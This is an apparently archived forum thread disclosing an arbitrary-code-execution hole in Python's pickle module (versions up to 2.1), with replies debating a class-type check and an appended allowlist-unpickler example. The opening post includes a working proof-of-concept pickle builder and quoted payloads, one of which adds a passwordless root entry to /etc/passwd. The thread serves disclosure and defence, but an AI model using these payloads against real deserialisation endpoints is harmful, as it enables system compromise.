Exploit for a security hole in the pickle module for Python versions <= 2.1.x 

"""
Exploit for a security hole in the pickle module for Python versions <= 2.1.x

Pickle is the name of a Python module for object persistence.  It can convert
arbitrary Python objects into byte streams and back.  Though the documentation
for Python 1.5.2 read
    The pickle module doesn't handle code objects, which the marshal
    module does. I suppose pickle could, and maybe it should, but there's
    probably no great need for it right now (as long as marshal continues
    to be used for reading and writing code objects), and at least this
    avoids the possibility of smuggling Trojan horses into a program.
it was always generally considered that a carefully-crafted "pickle" could
execute arbitrary code.

In Python 2.0, one hole was closed which was due to the use of eval() to
unpickle a string.  This hole could be exploited with a pickle string like
    "S''*__import__('os').system('echo 0wn3d')\np0\n."

In Python version 2.2, a new restriction was added to unpickling of
instances: when unpickle would have called a constructor, the class
must define an attribute __safe_for_unpickling__ with a true value,
or an exception will be raised.  Because a "class constructor" is
simply a callable object, a pickle can be written that names any function
and gives it arbitrary arguments.  Thus, a specially crafted pickle might
contain the instruction
    instantiate the class os.system with the argument
        "echo r00t::0:0::/:/bin/sh >> /etc/passwd"

Many major Linux distributions still ship with Python 1.5.2, which is
vulnerable to both of these types of exploits.  Some ship with 2.0 or 2.1,
usually in addition to 1.5.2.  These versions are vulnerable to the second
type of exploit.  I don't know of a Linux distribution which ships with
only Python 2.2, which is free from both these problems.  However,
I know of no particular uses that lead to a direct security breach.
"""

import pickle, new

# The forum's word filter replaced the original function name with
# "{*filter*}"; make_pickle is a placeholder name.
def make_pickle(module, function, *args):
    return pickle.dumps(new.classobj(function, (), {
        '__getinitargs__': lambda self, arg = args: arg,
        '__module__': module
    }) ())

# Create the evil pickle
t = make_pickle("__builtin__", "open", "/tmp/pickle-bug", "w")
# Show the user how it looks
print repr(t)
# Now, load the pickle -- creates the file /tmp/pickle-bug (by calling
# the builtin open() function), then raises an exception.  But the damage is
# done...
pickle.loads(t)



Sun, 02 Jan 2005 20:47:14 GMT  

Quote:
> Exploit for a security hole in the pickle module for Python versions <= 2.1.x

Thank you for the precise problem statement!
Quote:
> ...
> Because a "class constructor" is
> simply a callable object,
> a pickle can be written that names any function
> and gives it arbitrary arguments.

But this need not be the case!

   A "class constructor" is quite a special "function".
   Its "type" is "ClassType" (at least until Python 2.2).

Dieter



Tue, 04 Jan 2005 03:07:53 GMT  

Quote:
> > Exploit for a security hole in the pickle module for Python versions <= 2.1.x
> Thank you for the precise problem statement!
> > ...
> > Because a "class constructor" is
> > simply a callable object,
> > a pickle can be written that names any function
> > and gives it arbitrary arguments.
> But this need not be the case!
>
>    A "class constructor" is quite a special "function".
>    Its "type" is "ClassType" (at least until Python 2.2).

This test would "work" against the exploit I posted.  However, this test
is not implemented in any version of Python.  Furthermore, there are
classes which are unsafe to instantiate.  For instance, popen2.Popen3
is as dangerous a constructor as os.system is a function.

    >>> type(popen2.Popen3)
    <type 'class'>

That's the reason the "safe for unpickling" requirement was added.

Jeff



Tue, 04 Jan 2005 04:45:30 GMT  
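The two checks discussed in this thread, side by side in current Python 3: the "is it a class?" test and an explicit allowlist in the spirit of "safe for unpickling". This is an added example, not code from the thread; the ALLOWED set, the class names and the sample pickles are assumptions constructed for illustration, and subprocess.Popen stands in for the popen2.Popen3 mentioned in the last reply.

```python
import io
import pickle
import subprocess
from collections import OrderedDict

# Assumption: the only globals this application ever expects inside a pickle.
ALLOWED = {("collections", "OrderedDict")}


class ClassOnlyUnpickler(pickle.Unpickler):
    """The check proposed in the thread: accept any global that is a class."""

    def find_class(self, module, name):
        obj = super().find_class(module, name)
        if not isinstance(obj, type):
            raise pickle.UnpicklingError("%s.%s is not a class" % (module, name))
        return obj


class AllowlistUnpickler(pickle.Unpickler):
    """Accept only globals named on an explicit allowlist."""

    def find_class(self, module, name):
        if (module, name) not in ALLOWED:
            raise pickle.UnpicklingError("%s.%s is not allowed" % (module, name))
        return super().find_class(module, name)


def try_load(unpickler_cls, data):
    """Return ('ok', obj) or ('blocked', reason) for one pickle byte string."""
    try:
        return "ok", unpickler_cls(io.BytesIO(data)).load()
    except pickle.UnpicklingError as exc:
        return "blocked", str(exc)


# Constructed samples. Each pickle only *references* a global; none calls it.
SAMPLES = {
    "function": pickle.dumps(len),                       # builtins.len
    "dangerous class": pickle.dumps(subprocess.Popen),   # a class, like Popen3
    "expected data": pickle.dumps(OrderedDict(a=1)),
}

if __name__ == "__main__":
    for label, data in SAMPLES.items():
        for cls in (ClassOnlyUnpickler, AllowlistUnpickler):
            print(label, cls.__name__, try_load(cls, data)[0])
```

The class-only check rejects the function but resolves the process-spawning class, while the allowlist rejects both and still loads the expected data.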
 